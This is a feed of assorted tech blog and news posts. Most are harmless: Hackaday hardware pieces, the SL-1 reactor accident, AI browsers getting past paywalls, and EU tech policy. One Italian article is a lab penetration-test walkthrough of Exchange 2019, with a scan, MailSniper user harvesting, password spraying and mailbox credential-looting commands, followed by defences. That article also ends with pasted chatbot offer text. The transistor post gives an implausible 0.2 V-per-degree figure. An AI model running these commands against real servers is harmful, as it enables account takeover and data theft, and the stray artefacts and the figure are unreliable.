Aside from the motherboard there’s a VGA screen, a CompactFlash card attached to the IDE interface, and a Logitech trackball. As far as we can see the power comes from a USB-C PD board, and there’s a split mechanical keyboard on the top side. It runs Windows 98, and a selection of peak ’90s games are brought out to demonstrate.

We like this project for its beautiful case and effective use of parts, but we’re curious whether instead of the Pentium board it might have been worth finding a later industrial PC to give it a greater breadth of possibilities, there being few x86 SBCs. Either way it would have blown our minds back in ’98, and we can see it’s a ton of fun today. Take a look at the machine in the video below the break.

youtube.com/embed/G7RhMOKQaTs?…

Thanks [Stephen Walters] for the tip.


hackaday.com/2025/11/05/a-pent…


Better 3D-Printed Bridges Are Possible, With the Right Settings


The header image above shows a completely unsupported 3D-printed bridge, believe it or not. You’re looking at the bottom of the print. [Make Wonderful Things] wondered whether unsightly unsupported bridges could be improved, and has been busy nailing down remarkably high-quality results by exhaustive testing of different settings.

It all started when they thought that unsupported bridges looked a lot as though they were made from ropes stretched between two points. Unlike normal layers, these stretched extrusions didn’t adhere to their neighbors. They are too far apart from one another, and there’s no “squish” to them. But could this be overcome?

His experiments centered mainly around bridge printing speed, temperature, and bridge flow. That last setting affects how much the extrusion from the hot end is adjusted when printing a bridge. He accidentally increased it past 1.0 and thought the results were interesting enough to follow up on; it seemed that a higher flow rate when printing a bridge gave the nudge that was needed to get better inter-line adhesion. What followed was a lot of testing, finally settling on something that provided markedly better results than the stock slicer settings. Markedly better on his test pieces, anyway.
BF = Bridge flow, BS = Bridge printing speed (in mm/sec)
The best results seem to come from tweaking the Bridge Flow rate high enough that extrusions attach to their neighbors, printing slowly (he used 10 mm/sec), and ensuring the bridged area is as consistent as possible. There are still open questions, like some residual sagging at corners he hasn’t been able to eliminate, but the results otherwise look great. And it doesn’t even require laying one’s printer on its side!

All the latest is on the project page where you can download his test models, so if you’re of a mind to give it a try be sure to check it out and share your results. Watch a short video demonstrating everything, embedded just under the page break.

Thanks to [Hari] for the tip!

youtube.com/embed/xQBLv3cPUbo?…


hackaday.com/2025/11/05/better…


Penetration Testing di Microsoft Exchange Server: Tecniche, Strumenti e Contromisure


Spesso, durante i penetration test, ci ritroviamo ad avere accessi elevati (Domain Admin) all’interno di un’organizzazione. Alcune aziende si fermano a questo, pensando che ottenere il Domain Admin sia l’obiettivo finale.

Ma non lo è. «Ottenere il Domain Admin» non significa molto per la maggior parte dei dirigenti , se non mostrare concretamente cosa comporta in termini di rischio. Uno dei modi migliori per dimostrare il rischio per un’organizzazione è mostrare la possibilità di accedere a dati sensibili.

Descriviamo qui il penetration testing di Exchange 2019 in un laboratorio GOADv3 configurato su Ludus/Debian.


Il server Exchange target

Strumenti Utilizzati


Il toolkit principale usato è MailSniper, una suite PowerShell progettata per l’enumerazione interna e l’abuso delle mailbox Exchange tramite Exchange Web Services (EWS), Outlook Web Access (OWA) e altri endpoint standard.

Ho usato anche NetExec da una macchina Kali ma MailSniper dava problemi su powershell-linux ed ho dovuto basarmi su una Win11Pro:
MailSniper non ne voleva sapere di funzionare su Kali Qui la scansione NXC dell’intero ambiente

Fase 1: Ricognizione e Identificazione di Exchange Server


Prima di ogni attività di penetrazione è fondamentale localizzare con precisione il server Exchange.

  • Si parte dalla raccolta OSINT, tramite record MX DNS, URL pubblici di OWA, Autodiscover, certificati TLS e metadata visibili da post di lavoro o documenti pubblici.
  • Successivamente si eseguono scansioni mirate con Nmap verso servizi standard:


nmap -p25,80,443,445,587,993,995 -sV -oA exchange_scan 10.3.10.21
Questa scansione permette di individuare le porte di SMTP, HTTPS per OWA, SMB e servizi di posta sicura.

# Nmap 7.95 scan initiated Wed Oct 15 12:52:25 2025 as: /usr/lib/nmap/nmap --privileged -A -T 4 -Pn -oA /mnt/hgfs/VMsharedDownloads/Exchange2019InitialScan 10.3.10.21
Nmap scan report for 10.3.10.21
Host is up (0.0027s latency).
Not shown: 975 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/https
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| http-title: Outlook
|_Requested resource was 10.3.10.21/owa/auth/logon.aspx…
444/tcp open snpp?
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
587/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
1801/tcp open msmq?
2103/tcp open zephyr-clt?
2105/tcp open eklogin?
2107/tcp open msmq-mgmt?
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
3389/tcp open ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-15T16:52:55+00:00
| ssl-cert: Subject: commonName=the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-07T10:19:37
|_Not valid after: 2026-04-08T10:19:37
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
5986/tcp open wsmans?
| ssl-cert: Subject: commonName=WIN2019-SRV-X64
| Subject Alternative Name: DNS:WIN2019-SRV-X64, DNS:WIN2019-SRV-X64
| Not valid before: 2025-09-19T18:32:07
|_Not valid after: 2035-09-17T18:32:07
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6789/tcp open ibm-db2-admin?
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 3 hops
Service Info: Host: the-eyrie.sevenkingdoms.local; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerazione Utenti ed Endpoints Mail

Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21

Enumerazione Utenti ed Endpoints Mail


Dopo aver localizzato il server, si procede con la raccolta di utenti validi, indispensabile per attacchi come password spraying o bruteforce.

Con MailSniper si possono estrarre gli utenti dall’endpoint OWA e dalla Global Address List (GAL):

Invoke-UsernameHarvestOWA -UserList .\users.txt -ExchHostname 10.3.10.21 -Domain SEVENKINGDOMS -OutFile AccountsTrovati.txt


Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 -OutFile userlist.txt
Get-GlobalAddressList -ExchHostname 10.3.10.21 -UserName "domain\user" -Password "Password!" -OutFile gal.txt
Una lista utenti ben definita consente di simulare attacchi mirati, testando password realistiche basate su contesto (ad es. Game of Thrones simulati nel laboratorio), ovviamente ci si serve a monte divarie tecniche di OSINT .
MailSniper non fa altro estrarre li utenti dalla lista nota ad Exchange, questa che vediamo.


Fase 3: Password Spraying e Accesso Iniziale


Utilizzando password realistiche derivate da informazioni pubbliche e di contesto, si effettua il password spraying con MailSniper su ActiveSync EAS, OWA o SMTP:
Invoke-PasswordSpray -UserList userlist.txt -ExchHost 10.3.10.21 -Password "ilovejaime" -OutFile spray_results.txt

Quando si ottiene un accesso valido, ad esempio una combinazione utente/password, si può utilizzare PowerShell per accedere al mailbox tramite EWS ed iniziare la fase di post-exploitation.


Le credenziali sono corrette:

Post-Exploitation e Ricerca di Informazioni Sensibili


Con MailSniper, da un account compromesso, si può:

  • Cercare all’interno della mailbox illeciti credenziali o informazioni sensibili:

Invoke-SelfSearch -Mailbox compromised@domain.local -Terms "password","vpn","confidential"


  • Enumerare gli allegati e scaricarli per analisi esterna:

Invoke-SelfSearch -Mailbox compromised@domain.local -CheckAttachments -DownloadDir C:\loot\


  • Se si dispone di un ruolo amministrativo con permessi di impersonation, espandere la ricerca globalmente sulle mailbox della rete:

Invoke-GlobalMailSearch -ImpersonationAccount "domain\admin" -ExchHostname 10.3.10.21 -Terms "password","confidential" -OutputCsv all_mail_search.csv

Lateral Movement e Escalation Privilegi


Accedere alle mailbox permette di ricercare credenziali di account privilegiati (ad es. Domain Admin), spesso presenti come allegati o messaggi.

Con queste credenziali si possono:

  • Accedere a sistemi interni tramite RDP o PowerShell remoting.
  • Sfruttare tecniche come Kerberoasting (richiesta ticket Kerberos a servizi Exchange) per ricavare hash da crackare.
  • Usare deleghe Exchange e permessi mailbox per inviare mail “Send As” e muoversi nel dominio.

Comandi utili per controllare permessi mailbox:

Invoke-MailboxPermsAudit -ExchHostname 10.3.10.21 -UserName "domain\user" -Password "password" -OutFile mailbox_permissions.csv

Difese Consigliate contro Attacchi a Exchange


Per mitigare i rischi evidenziati:

  • Limitare permessi mailbox e delegation: solo i ruoli strettamente necessari devono poter impersonare o inviare mail per conto di altri.
  • Monitoraggio delle attività Exchange: logging approfondito per autenticazioni, uso di EWS e tentativi mail sospetti.
  • Aggiornamenti puntuali: installare le patch contro vulnerabilità note come ProxyLogon, ProxyShell, e zero-day emergenti.
  • Multi-Factor Authentication (MFA) su OWA, EAS e PowerShell remoting per ridurre l’efficacia di credential stuffing.
  • Segmentazione della rete: isolare i server Exchange e limitare l’accesso dalla DMZ e zona interna in base ai principi di least privilege.
  • Controlli e blocchi di password spraying: implementare politiche di lockout, analisi comportamentale e tool interni per identificare logon sospetti.

(Immagine: schema di rete con segmentazione e controllo accessi)

Conclusioni


Il penetration test di un Exchange Server 2019 richiede una metodologia articolata che va dalla ricognizione accurata, passando per attacchi mirati come password spraying, fino all’abuso post-compromissione di mailbox per avanzare nella rete.

Il laboratorio GOADv3 su Ludus/Debian fornisce un ambiente ideale per simulare queste tecniche in sicurezza, permettendo di affinare le capacità offensive e, soprattutto, di testare le difese IT.

L’uso di strumenti come MailSniper facilita la ricerca di credenziali, permessi e dati sensibili, dimostrando concretamente il rischio che una compromissione di Exchange comporta per un’organizzazione.

Implementare difese robuste e monitoraggio continuo è la chiave per ridurre la superficie di attacco e rallentare gli avversari informatici contemporanei.

Se interessa, posso anche fornire in seguito uno script PowerShell automatizzato per alcune delle procedure sopra descritte.

Se vuoi, posso creare il testo con formattazione markdown anche per post o documenti tecnici. Vuoi procedere?

Sources
[1] test-art.pdf ppl-ai-file-upload.s3.amazonaw…

L'articolo Penetration Testing di Microsoft Exchange Server: Tecniche, Strumenti e Contromisure proviene da Red Hot Cyber.


Hacking Buttons Back Into the Car Stereo


To our younger readers, a car without an all-touchscreen “infotainment” system may look clunky and dated, but really, you kids don’t know what they’re missing. Buttons, knobs, and switches all offer a level of satisfying tactility and feedback that touchscreens totally lack. [Garage Builds] on YouTube agrees; he also doesn’t like the way his aftermarket Kenwood head unit looks in his 2004-vintage Nissan. That’s why he decided to take matters into his own hands, and hack the buttons back on.

Rather than source a vintage stereo head unit, or try and DIY one from scratch, [Garage Builds] has actually hidden the modern touchscreen unit behind a button panel. That button panel is actually salvaged from the stock stereo, so the looks fit the car. The stereo’s LCD gets replaced with a modern color unit, but otherwise it looks pretty stock at the end.

Adding buttons to the Kenwood is all possible thanks to steering-wheel controls. In order to make use of those, the touchscreen head unit came with a little black box that translated the button press into some kind of one-wire protocol that turned out to be an inverted and carrier-less version of the NEC protocol used in IR TV remotes. (That bit of detective work comes from [michaelb], who figured all this out for his Ford years ago, but [Garage Builds] is also sharing his code on GitHub.)

Having the protocol, it simply becomes a matter of grabbing a microcontroller to scan the stock buttons and output the necessary codes to the Kenwood head unit. Of course now he has extra buttons, since the digital head unit has no tape or CD changer to control, nor AM/FM radio to tune. Those get repurposed for the interior and exterior RGB lighting [Garage Builds] has ̶i̶n̶f̶l̶i̶c̶t̶e̶d̶ mounted on this ̶p̶o̶o̶r̶ lovely car. (There’s no accounting for taste. Some of us love the look and some hate it, but he’s certainly captured an aesthetic, and now has easy control of it to boot.) [Garage Builds] has got custom digital gauges to put into the dash of his Nissan, and some of the extra buttons have been adapted to control those, too.

The whole car is actually a rolling hack as you can see from the back catalog of the [Garage Builds] YouTube channel, which might be worth a look if you’re in the intersection of the “electronics enthusiast” and “gearhead” Venn Diagram.

There’s no accounting for taste, but we absolutely agree with him that making everything black rectangles is the death of industrial design.

This isn’t the first time we’ve seen retro radios hacked together with micro-controllers; take a look at this one from a 1970s Toyota. Now that’s vintage!


hackaday.com/2025/11/05/hackin…


2025 Component Abuse Challenge: The Ever-Versatile Transistor as a Temperature Sensor


One of the joys of writing up the entries for the 2025 Component Abuse Challenge has come in finding all the different alternative uses for the humble transistor. This building block of all modern electronics does a lot more than simply performing as a switch, for as [Aleksei Tertychnyi] tells us, it can also function as a temperature sensor.

How does this work? Simple enough, the base-emitter junction of a transistor can function as a diode, and like other diodes, it shows a roughly 0.2 volt per degree voltage shift with temperature (for a silicon transistor anyway). Taking a transistor and forward biasing the junction with a 33 K resistor, he can read the resulting voltage directly with an analogue to digital converter and derive a temperature reading.

The transistor features rarely as anything but a power device in the projects we bring you in 2025. Maybe you can find inspiration to experiment for yourself, and if you do, you still have a few days in which to make your own competition entry.

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/05/2025-c…


The Deadliest US Nuclear Accident is Not What You Think


When you think of a US Nuclear accident, you probably think of Three Mile Island. However, there have been over 50 accidents of varying severity in the US, with few direct casualties. (No one died directly from the Three Mile Island incident, although there are some studies that show increased cancer rates in the area.)

Indeed, where there are fatalities, it hasn’t been really related to the reactor. Take the four people who died at the Surry Nuclear Power Plant accident: they were killed when a steam pipe burst and fatally scalded them. At Arkansas Nuclear One, a 525-ton generator was being moved, the crane failed to hold it, and one person died. That sort of thing could happen in any kind of industrial setting.

But one incident that you have probably never heard of took three lives as a direct result of the reactor. True, it was a misuse of the reactor, and it led to design changes to ensure it can’t happen again. And while the incident was nuclear-related, the radiation didn’t kill them, although it probably would have if they had survived their injuries.

Background

The large cylinder housed the SL-1 reactor. The picture is from some time before the accident (public domain).
It may be a misattribution, but it is often said that Napoleon said something like, “An army marches on its stomach.” A modern army might just as well march on electrical power. So the military has a keen interest in small nuclear reactors to both heat sites in cold climates and generate electricity when in remote locations or in, as they like to call it, denied areas.

In the mid-1950s, the Army tasked Argonne National Laboratory to prototype a small reactor. They wanted it portable, so it had to break down to relatively small pieces, if you consider something weighing 10 tons as small, and could be set up in the field.

The resulting prototype was the Stationary Low-Power Reactor Number One, known as SL-1, operated by the Army in late 1958. It could provide about 400 kW of heating or 200 kW of electricity. The reactor core was rated for 3 MW (thermal) but had been tested at 4.7 MW a few times. It would end operations due to an accident in 1961.

Design

Sketch of the reactor internals (public domain).
The reactor was a conventional boiling-water reactor design that used natural circulation of light water as both coolant and moderator. The fuel was in the form of plates of a uranium-aluminum alloy.

The reactor was inside a 48-foot-tall cylinder 38.5 feet in diameter. It was made of quarter-inch plate steel. Because the thing was in the middle of nowhere in Idaho, this was deemed sufficient. There was no containment shell like you’d find on reactors nearer to population centers.

The reactor, at the time of the accident, had five control rods, although it could accommodate nine. It could also hold 59 fuel assemblies, but only 40 were in use. Because of the reduced number of fuel plates, the reactor’s center region was more active than it would have been under full operation. The rods were eight in a circle with four dummies and a ninth one in the center. Because of the missing outer rods, the center control rod was more critical than the four others.

The Accident


In January of 1961, the reactor had been shut down for 11 days over the holiday. In preparation for restarting, workers had to reconnect the rods to their drive motors. The procedure was to pull the rod up four inches to allow the motor attachment.
Cutaway of the SL-1 and the control building (public domain).
There were three workers: Specialist Richard McKinley, Specialist John Byrnes, and a Navy Seabee Electrician First Class Richard Legg. Legg was in charge, and McKinley was a trainee.

From a post-accident investigation, they are fairly sure that Byrnes inexplicably pulled the center rod out 20 inches instead of the requisite four inches. The reactor went prompt critical, and, in roughly four milliseconds, the 3 MW core reached 20 GW. There wasn’t enough time for sufficient steam to form to trigger the safeties, which took 7.5 milliseconds.

The extreme heat melted the fuel, which explosively vaporized. The reactor couldn’t dissipate so much heat so quickly, and a pressure wave of about 10,000 pounds hit the top of the reactor vessel. The 13-ton vessel flew up at about 18 miles an hour, and plugs flew out, allowing radioactive boiling water and steam to spray the room. At about nine feet, it collided with the ceiling and a crane and fell back down. All this occurred in about two seconds.

As you might imagine, you didn’t want to be in the room, much less on top of the reactor. Two of the operators were thrown to the floor. Byrnes’ fall causes his rib to fatally pierce his heart. McKinley was also badly injured but only survived for about two hours after the accident. Legg was found dead and stuck to the ceiling, an ejected shield plug impaling him.

Why?

Actual photo of the destroyed reactor taken by a camera on the end of a crane.
You can place a lot of blame here. Of course, you probably shouldn’t have been able to pull the rod up that far, especially given that it was carrying more of the load than the other rods. The contractor that helped operate the facility wasn’t available around the clock due to “budget reasons.” There’s no way to know if that would have helped, of course.

But the real question is: why did they pull the rod up 20 inches instead of four? We may never know. There are, of course, theories. Improbably, people have tried to explain it as sabotage or murder-suicide due to some dispute between Byrnes and one of the other men. But that doesn’t seem to be the most likely explanation.

Apparently, the rods sometimes stuck due to misalignment, corrosion, or wear. During a ten-month period, for example, about 2.5% of the drop-and-scram tests failed because of this sticking: a total of 40 incidents. However, many of those causes only apply when the rods are automatically moved. Logbooks showed that manual movement of the rods had been done well over 500 times. There was no record of any sticking during manual operations. Several operators were asked, and none could recall any sticking. However, the rate of sticking was increasing right before the incident, just not from manual motion.

However, it is easy to imagine the 48-pound rod being stuck, pulling hard on it, and then having it give way. We’ve all done something like that, just not with such dire consequences.

Aftermath


First responders had a difficult time with this incident due to radiological problems. There had been false alarms before, so when six firefighters arrived on the scene, they weren’t too concerned. But when they entered the building, they saw radiation warning lights on and their radiation detectors pegged.

Even specialized responders with better equipment couldn’t determine just how much radiation was there, except for “plenty.” Air packs were fogging, limiting visibility. During the rescue of McKinley, one rescuer had to remove a defective air pack and breathe contaminated air for about three minutes. Freeing Legg’s body required ten men working in pairs, because each team could only work in the contaminated zone for 65 seconds. The rule had been that you could tolerate 100 Röntgens (about 1 Sv or 100 rem) to save a life and 25 (0.25 Sv or 25 rem) to save valuable property. Of the 32 people involved in the initial response, 22 received between 3 and 27 Röntgens exposure. Further, 790 people were exposed to harmful radiation levels during the subsequent cleanup.

The reactor building did prevent most of the radioactive material from escaping, but iodine-131 levels in some areas reached about 50 times normal levels. The remains of the site are buried nearby, and that’s the source of most residual radiation.

Lessons Learned


Unsurprisingly, the SL-1 design was abandoned. Future designs require that the reactor be safe even if one rod is entirely removed: the so-called “one stuck rod” rule. This also led to stricter operating procedures. What’s more, it is now necessary to ensure emergency responders have radiation meters with higher ranges. Regulations are often written in blood.

The Atomic Energy Commission made a film about the incident for internal use but, of course, now, you can watch it from your computer, below.

youtube.com/embed/gIBQMkd96CA?…

You might also enjoy this presentation by one of the first responders who was actually there, which you can see below. If you want a more detailed history, check out Chapters 15 and 16 of [Susan M. Stacy’s] book “Proving the Principle” that you can read online.

youtube.com/embed/gMNqPUT-yP0?…

Nuclear accidents can ruin your day. We are always surprised at how many ordinary mistakes happen at reactors like Brown’s Ferry.


hackaday.com/2025/11/05/the-de…


SolidWorks Certification… With FreeCAD?


There are various CAD challenges out there that come with bragging rights. Some, like the Certified Solid Works Professional Exam (CWSP) might actually look good on a resume. [Deltahedra] is apparently not too interested in padding his resume, nor does he have much interest in SolidWorks, and so decided to conquer the CWSP with FreeCAD in the name of open source — and to show us all how he did it.

Because these CAD exams are meant to show your chops with the program, the resulting video makes an awesome FreeCAD tutorial. Spoiler alert: he’s able to model the part, though it takes him about 15 minutes. After modeling the part, the CWSP exam needs you to find the mass of the part, which [Deltahedra] does with the FCInfo macro — which, of course, he shows us how to install and use. The second and third questions are similar: change some variables (it is a parametric modeling software, after all) and find the new mass. In a second exercise, he needs to modify the model according to a new drawing. Modifying existing models can sometimes be more difficult than creating them, but [Deltahedra] and FreeCAD pass with flying colors once again.

If you’re at all curious about what FreeCAD can do, this video is a really impressive demonstration of FreeCAD’s part modeling workbench. We’ve had a few FreeCAD guides of our on on Hackaday, like this one on reverse engineering STLs and this one on best practices in the software, but if you’d asked us before the release of v1.0 we’d never have guessed you could use it for a SolidWorks exam in 2025. So while there are kudos due to [Deltahedra], the real accolades belong to the hardworking team behind FreeCAD that has brought it this far. Bravo!

youtube.com/embed/VEfNRST_3x8?…


hackaday.com/2025/11/05/solidw…


L’era dei Paywall è finita? I Browser intelligenti l’aggirano e controllarli è molto difficile


Come possono gli editori proteggersi dai browser “intelligenti” dotati di intelligenza artificiale se hanno l’aspetto di utenti normali? L’emergere di nuovi browser “intelligenti” basati sull’intelligenza artificiale sta mettendo in discussione i metodi tradizionali di protezione dei contenuti online.

Il browser Atlas di OpenAI, recentemente rilasciato, così come Comet di Perplexity e la modalità Copilot di Microsoft Edge, stanno diventando strumenti in grado di fare molto più che visualizzare pagine web: svolgono attività in più fasi, ad esempio raccogliendo informazioni di calendario e generando briefing per i clienti basati sulle notizie.

Le loro capacità stanno già ponendo serie sfide agli editori che cercano di limitare l’uso dell’intelligenza artificiale nei loro contenuti. Il problema è che tali browser sono esteriormente indistinguibili dagli utenti normali.

Quando Atlas o Comet accedono a un sito, vengono identificati come sessioni standard di Chrome, non come crawler automatici. Questo li rende impossibili da bloccare utilizzando il protocollo di esclusione dei robot, poiché bloccare tali richieste potrebbe contemporaneamente impedire l’accesso agli utenti normali. Il rapporto “State of the Bots” di TollBit osserva che la nuova generazione di visitatori AI è “sempre più simile a quella umana”, rendendo più impegnativo il monitoraggio e il filtraggio di tali agenti.

Un ulteriore vantaggio per i browser basati sull’intelligenza artificiale è il modo in cui sono strutturati gli abbonamenti a pagamento moderni. Molti siti web, tra cui MIT Technology Review, National Geographic e il Philadelphia Inquirer, utilizzano un approccio lato client: l’articolo viene caricato per intero ma viene nascosto dietro una finestra pop-up che offre un abbonamento. Mentre il testo rimane invisibile agli esseri umani, è accessibile all’intelligenza artificiale. Solo i paywall lato server, come quelli di Bloomberg o del Wall Street Journal, nascondono in modo affidabile i contenuti fino a quando l’utente non effettua l’accesso. Tuttavia, se l’utente ha effettuato l’accesso, l’agente di intelligenza artificiale può leggere liberamente l’articolo per suo conto.

OpenAI Atlas ha ricevuto il testo completo di un articolo esclusivo per gli abbonati da MIT Technology Review (CJR).

Durante i test, Atlas e Comet hanno estratto facilmente il testo completo delle pubblicazioni classificate del MIT Technology Review, nonostante le restrizioni imposte da crawler aziendali come OpenAI e Perplexity.

In un caso, Atlas è anche riuscito a riassemblare un articolo bloccato di PCMag combinando informazioni provenienti da altre fonti, come tweet, aggregatori e citazioni di terze parti. Questa tecnica, soprannominata “digital breadcrumb”, è stata precedentemente descritta dallo specialista di ricerca online Henk van Ess.

OpenAI afferma che i contenuti visualizzati dagli utenti tramite Atlas non vengono utilizzati per addestrare i modelli, a meno che non sia abilitata la funzione “Memorie del browser”. Tuttavia, “ChatGPT ricorderà i dettagli chiave delle pagine visualizzate”, il che, come ha osservato Jeffrey Fowler, editorialista del Washington Post, rende l’informativa sulla privacy di OpenAI confusa e incoerente. Non è ancora chiaro in che misura l’azienda utilizzi i dati ottenuti tramite contenuti a pagamento.

Si osserva un approccio decisamente selettivo: Atlas evita di contattare direttamente i siti web che hanno intentato cause legali contro OpenAI , come il New York Times, ma cerca comunque di aggirare il divieto compilando un riassunto dell’argomento da altre pubblicazioni – The Guardian, Reuters, Associated Press e il Washington Post – che hanno accordi di licenza con OpenAI. Comet, al contrario, non mostra tale moderazione.

Questa strategia trasforma l’agente artificiale in un intermediario che decide quali fonti sono considerate “accettabili”. Anche se l’editore riesce a bloccare l’accesso diretto, l’agente sostituisce semplicemente l’originale con una versione alternativa degli eventi. Questo altera la percezione stessa dell’informazione: l’utente riceve non un articolo, ma un’interpretazione generata automaticamente.

I browser basati sull’intelligenza artificiale non hanno ancora raggiunto un’ampia diffusione, ma è già chiaro che le barriere tradizionali come i paywall e il blocco dei crawler non sono più efficaci. Se tali agenti dovessero diventare il mezzo principale per leggere le notizie, le case editrici dovranno trovare nuovi meccanismi per garantire la trasparenza e il controllo su come i loro contenuti vengono utilizzati dall’intelligenza artificiale.

L'articolo L’era dei Paywall è finita? I Browser intelligenti l’aggirano e controllarli è molto difficile proviene da Red Hot Cyber.


Europe's 'Jekyll and Hyde' tech strategy


Europe's 'Jekyll and Hyde' tech strategy
WELCOME BACK TO DIGITAL POLITICS. I'm Mark Scott, and have partnered with YouGov and Microsoft for a dinner in Brussels on Dec 10 to recap the digital policymaking highlights of 2025 and to look ahead to what is in store for next year.

If you would like to attend, please let me know here. The event will include exclusive insight from YouGov on Europeans' attitudes toward technology. Spaces are limited, so let me know asap.

— November will again show how much the European Union is split over the bloc's strategy toward technology.

— The annual climate change talks begin in Brazil on Nov 10. The tech industry's impact has gone from bad to worse.

— Big Tech firms have massively increased their spending on tech lobbying within the EU institutions. Here are the stats.

Let's get started:


IT'S THE EU, AND IT'S HERE TO HELP


IT'S GOING TO BE A BUSY MONTH. On Nov 18, France and Germany will gather officials, industry executives and (just a few) civil society groups in Berlin for the so-called "Summit on European Digital Sovereignty." The one-day conference (as well as a series of side events) is aimed at figuring out what the European Union's position on the topic should be — despite more than five years since the concept of digital sovereignty started during the rounds in Brussels.

Then, on Nov 19, the European Commission is expected to announce its so-called "Digital Omnibus," or Continent-wide effort to simplify the bloc's tech rules, primarily focused around the Artificial Intelligence Act, General Data Protection Regulation, Cybersecurity Act and the ePrivacy Directive. It's a response to the competitiveness report written by Mario Draghi, the former Italian prime minister, which suggested (without much evidence) that Europe's complex digital rulebook was a major reason why the Continent had failed to compete with the likes of China and the United States.

The one-two punch of the Digital Sovereignty summit and the Digital Omnibus represent the two countervailing strategies toward technology that are battling for supremacy in Brussels and other EU member capitals.

There's a long history about why France and Germany still don't see eye-to-eye on digital sovereignty. Paris would prefer to create national (read: French) tech champions that can then compete globally. Berlin would prefer to work with allies on tech issues, though the newly-installed government is starting to change its tune.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in October:
— How social media failed to respond to the highest level of global conflict since WWII; The fight over semiconductors between China and the US is worsening the "splinternet;" DeepSeek's vaunted success may not what it first appears. More here.
— The European Union's AI strategy is re-living mistakes of previous shifts in global technology; Domestic US politics overshadow the global attacks on online safety laws; The consequences of Big Tech's pullback on political ad transparency is a hit to free speech. More here.
